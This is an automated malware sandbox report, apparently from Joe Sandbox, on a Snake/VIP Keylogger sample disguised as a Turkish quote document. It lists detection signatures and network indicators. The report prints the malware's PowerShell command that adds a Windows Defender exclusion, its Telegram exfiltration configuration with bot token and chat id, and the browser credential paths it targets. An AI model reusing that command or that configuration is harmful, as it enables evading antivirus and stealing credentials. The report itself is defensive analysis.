Edit tour

Windows Analysis Report
#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Overview

General Information

Sample name:	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe renamed because original name is a hash value
Original sample name:	LC HOLDNG a.s fiyati_teklif 017867Siparii jpeg doc .exe
Analysis ID:	1586928
MD5:	170c62d3ca5f52d7307613cc070194b7
SHA1:	41c97a3f21f9e5c9d636f3228c780baea6fe9b09
SHA256:	1ab57c3722041788277908522650c68f137e173a4862aab5ac10b6d3ea1d7ef5
Tags:	exeuser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates processes with suspicious names

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe (PID: 7916 cmdline: "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe" MD5: 170C62D3CA5F52D7307613CC070194B7)

powershell.exe (PID: 8076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe (PID: 8084 cmdline: "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe" MD5: 170C62D3CA5F52D7307613CC070194B7)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat id": "-4732682041", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat_id": "-4732682041", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d03b:$a1: get_encryptedPassword 0x2d350:$a2: get_encryptedUsername 0x2ce4b:$a3: get_timePasswordChanged 0x2cf54:$a4: get_passwordField 0x2d051:$a5: set_encryptedPassword 0x2e6f7:$a7: get_logins 0x2e65a:$a10: KeyLoggerEventArgs 0x2e2bf:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.3866206375.0000000002EBD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000004.00000002.3866206375.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d423:$a1: get_encryptedPassword 0x6fe43:$a1: get_encryptedPassword 0xb2663:$a1: get_encryptedPassword 0x2d738:$a2: get_encryptedUsername 0x70158:$a2: get_encryptedUsername 0xb2978:$a2: get_encryptedUsername 0x2d233:$a3: get_timePasswordChanged 0x6fc53:$a3: get_timePasswordChanged 0xb2473:$a3: get_timePasswordChanged 0x2d33c:$a4: get_passwordField 0x6fd5c:$a4: get_passwordField 0xb257c:$a4: get_passwordField 0x2d439:$a5: set_encryptedPassword 0x6fe59:$a5: set_encryptedPassword 0xb2679:$a5: set_encryptedPassword 0x2eadf:$a7: get_logins 0x714ff:$a7: get_logins 0xb3d1f:$a7: get_logins 0x2ea42:$a10: KeyLoggerEventArgs 0x71462:$a10: KeyLoggerEventArgs 0xb3c82:$a10: KeyLoggerEventArgs
Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 7916	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 7916	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 7916	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 7916	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 7916	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b6be:$a1: get_encryptedPassword 0x2b9c9:$a2: get_encryptedUsername 0x2b4d8:$a3: get_timePasswordChanged 0x2b5e1:$a4: get_passwordField 0x2b6d4:$a5: set_encryptedPassword 0x2db6e:$a7: get_logins 0x2dad1:$a10: KeyLoggerEventArgs 0x2d73a:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 8084	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 8084	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 8084	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 8084	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1add0:$a1: get_encryptedPassword 0x1b0db:$a2: get_encryptedUsername 0x1abea:$a3: get_timePasswordChanged 0x1acf3:$a4: get_passwordField 0x1ade6:$a5: set_encryptedPassword 0x1d280:$a7: get_logins 0x1d1e3:$a10: KeyLoggerEventArgs 0x1ce4c:$a11: KeyLoggerEventArgsEventHandler
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b43b:$a1: get_encryptedPassword 0x2b750:$a2: get_encryptedUsername 0x2b24b:$a3: get_timePasswordChanged 0x2b354:$a4: get_passwordField 0x2b451:$a5: set_encryptedPassword 0x2caf7:$a7: get_logins 0x2ca5a:$a10: KeyLoggerEventArgs 0x2c6bf:$a11: KeyLoggerEventArgsEventHandler
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39263:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38906:$a3: \Google\Chrome\User Data\Default\Login Data 0x38b63:$a4: \Orbitum\User Data\Default\Login Data 0x39542:$a5: \Kometa\User Data\Default\Login Data
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c065:$s1: UnHook 0x2c06c:$s2: SetHook 0x2c074:$s3: CallNextHook 0x2c081:$s4: _hook
4.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
4.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d23b:$a1: get_encryptedPassword 0x2d550:$a2: get_encryptedUsername 0x2d04b:$a3: get_timePasswordChanged 0x2d154:$a4: get_passwordField 0x2d251:$a5: set_encryptedPassword 0x2e8f7:$a7: get_logins 0x2e85a:$a10: KeyLoggerEventArgs 0x2e4bf:$a11: KeyLoggerEventArgsEventHandler
4.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b063:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a706:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a963:$a4: \Orbitum\User Data\Default\Login Data 0x3b342:$a5: \Kometa\User Data\Default\Login Data
4.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2de65:$s1: UnHook 0x2de6c:$s2: SetHook 0x2de74:$s3: CallNextHook 0x2de81:$s4: _hook
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b43b:$a1: get_encryptedPassword 0x2b750:$a2: get_encryptedUsername 0x2b24b:$a3: get_timePasswordChanged 0x2b354:$a4: get_passwordField 0x2b451:$a5: set_encryptedPassword 0x2caf7:$a7: get_logins 0x2ca5a:$a10: KeyLoggerEventArgs 0x2c6bf:$a11: KeyLoggerEventArgsEventHandler
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39263:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38906:$a3: \Google\Chrome\User Data\Default\Login Data 0x38b63:$a4: \Orbitum\User Data\Default\Login Data 0x39542:$a5: \Kometa\User Data\Default\Login Data
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c065:$s1: UnHook 0x2c06c:$s2: SetHook 0x2c074:$s3: CallNextHook 0x2c081:$s4: _hook
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d23b:$a1: get_encryptedPassword 0x6fa5b:$a1: get_encryptedPassword 0x2d550:$a2: get_encryptedUsername 0x6fd70:$a2: get_encryptedUsername 0x2d04b:$a3: get_timePasswordChanged 0x6f86b:$a3: get_timePasswordChanged 0x2d154:$a4: get_passwordField 0x6f974:$a4: get_passwordField 0x2d251:$a5: set_encryptedPassword 0x6fa71:$a5: set_encryptedPassword 0x2e8f7:$a7: get_logins 0x71117:$a7: get_logins 0x2e85a:$a10: KeyLoggerEventArgs 0x7107a:$a10: KeyLoggerEventArgs 0x2e4bf:$a11: KeyLoggerEventArgsEventHandler 0x70cdf:$a11: KeyLoggerEventArgsEventHandler
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2de65:$s1: UnHook 0x70685:$s1: UnHook 0x2de6c:$s2: SetHook 0x7068c:$s2: SetHook 0x2de74:$s3: CallNextHook 0x70694:$s3: CallNextHook 0x2de81:$s4: _hook 0x706a1:$s4: _hook
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d23b:$a1: get_encryptedPassword 0x6fc5b:$a1: get_encryptedPassword 0xb247b:$a1: get_encryptedPassword 0x2d550:$a2: get_encryptedUsername 0x6ff70:$a2: get_encryptedUsername 0xb2790:$a2: get_encryptedUsername 0x2d04b:$a3: get_timePasswordChanged 0x6fa6b:$a3: get_timePasswordChanged 0xb228b:$a3: get_timePasswordChanged 0x2d154:$a4: get_passwordField 0x6fb74:$a4: get_passwordField 0xb2394:$a4: get_passwordField 0x2d251:$a5: set_encryptedPassword 0x6fc71:$a5: set_encryptedPassword 0xb2491:$a5: set_encryptedPassword 0x2e8f7:$a7: get_logins 0x71317:$a7: get_logins 0xb3b37:$a7: get_logins 0x2e85a:$a10: KeyLoggerEventArgs 0x7127a:$a10: KeyLoggerEventArgs 0xb3a9a:$a10: KeyLoggerEventArgs
1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2de65:$s1: UnHook 0x70885:$s1: UnHook 0xb30a5:$s1: UnHook 0x2de6c:$s2: SetHook 0x7088c:$s2: SetHook 0xb30ac:$s2: SetHook 0x2de74:$s3: CallNextHook 0x70894:$s3: CallNextHook 0xb30b4:$s3: CallNextHook 0x2de81:$s4: _hook 0x708a1:$s4: _hook 0xb30c1:$s4: _hook
Click to see the 26 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe", ParentImage: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, ParentProcessId: 7916, ParentProcessName: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe", ProcessId: 8076, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe", ParentImage: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, ParentProcessId: 7916, ParentProcessName: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe", ProcessId: 8076, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T19:10:00.249215+0100	2803305	3	Unknown Traffic	192.168.2.8	49711	104.21.96.1	443	TCP
2025-01-09T19:10:02.735524+0100	2803305	3	Unknown Traffic	192.168.2.8	49715	104.21.96.1	443	TCP
2025-01-09T19:10:26.833472+0100	2803305	3	Unknown Traffic	192.168.2.8	49721	104.21.96.1	443	TCP
2025-01-09T19:10:36.281626+0100	2803305	3	Unknown Traffic	192.168.2.8	49726	104.21.96.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T19:09:58.474150+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49708	132.226.247.73	80	TCP
2025-01-09T19:09:59.662112+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49708	132.226.247.73	80	TCP
2025-01-09T19:10:02.114780+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49713	132.226.247.73	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T19:10:44.381009+0100	1810008	1	Potentially Bad Traffic	192.168.2.8	49728	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T19:10:37.510861+0100	1810007	1	Potentially Bad Traffic	192.168.2.8	49727	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat_id": "-4732682041", "Version": "4.4"}
Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat id": "-4732682041", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49710 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49727 version: TLS 1.2

Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: JZPm.pdb source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe
Source:	Binary string: JZPm.pdbSHA256 source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 06A9A41Ah	1_2_06A99CCC
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then push 00000000h	4_2_0131F046
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 02C2F305h	4_2_02C2F3D7
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 02C2F305h	4_2_02C2F354
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 02C2F305h	4_2_02C2F168
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 02C2FAC1h	4_2_02C2F809
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 059B31E8h	4_2_059B2DD0
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4x nop then jmp 059B31E8h	4_2_059B2DCA
